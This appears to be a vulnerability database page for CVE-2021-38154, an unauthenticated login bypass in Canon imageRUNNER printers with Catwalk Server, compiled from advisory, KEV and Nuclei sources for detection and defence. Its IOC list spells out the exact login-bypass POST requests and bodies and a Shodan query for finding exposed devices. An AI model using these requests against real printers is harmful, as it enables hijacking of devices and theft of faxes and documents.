CVE-2021-38154
published 2021-08-29CVE-2021-38154: Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow…
PriorityP275high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
4.00%
89.2th percentile
Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.
Detection & IOCsextracted from sources · hover to see the quote
- →Shodan query 'title:"imageRUNNER"' can be used to identify exposed Canon imageRUNNER devices with Catwalk Server enabled for HTTP access. ↗
- →Exploit attempt via POST to /tryLogin.cgi with body 'loginM=&0000=0011&0002=' should return HTTP 303 redirect to /portal_top.html and set a 'fusion-http-session-id' cookie, indicating successful unauthenticated login. ↗
- →Exploit attempt via POST to /checkLogin.cgi with body 'i0017=2&i0019=' should return HTTP 302 redirect to /portal_top.html and set a 'sessid' cookie, indicating successful unauthenticated login via the alternate login path. ↗
- →Vulnerability is exploitable only when Catwalk Server is enabled for HTTP access and no PIN is configured for General User Mode on Canon devices manufactured 2012–2020. ↗
- ·The vulnerability is only exploitable when no PIN is set for General User Mode. Devices with a PIN configured are not affected by this unauthenticated bypass. ↗
- ·Catwalk Server must be explicitly enabled for HTTP access for the attack surface to be present; devices with Catwalk Server disabled or restricted to HTTPS only may not be vulnerable. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-53fm-fvpg-f4cc: Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, al
ghsa_unreviewed·2022-05-24
CVE-2021-38154 [HIGH] CWE-732 GHSA-53fm-fvpg-f4cc: Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, al
Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.
VulnCheck
canon - Incorrect Permission Assignment for Critical Resource
vulncheck·2021·CVSS 7.5
CVE-2021-38154 [HIGH] canon - Incorrect Permission Assignment for Critical Resource
canon - Incorrect Permission Assignment for Critical Resource
Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.
Affected: canon -
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://protocolpolice.nl/CVE-2021-38154_Protocol_Police_Catwal
No detection rules found.
Nuclei
Canon Devices - Authentication Bypass in Catwalk Server
nuclei·CVSS 7.5
CVE-2021-38154 [HIGH] Canon Devices - Authentication Bypass in Catwalk Server
Canon Devices - Authentication Bypass in Catwalk Server
Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.
Template:
id: CVE-2021-38154
info:
name: Canon Devices - Authentication Bypass in Catwalk Server
author: daffainfo
severity: high
description: |
Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is
No writeups or analysis indexed.
2021-08-29
Published
Exploited in the wild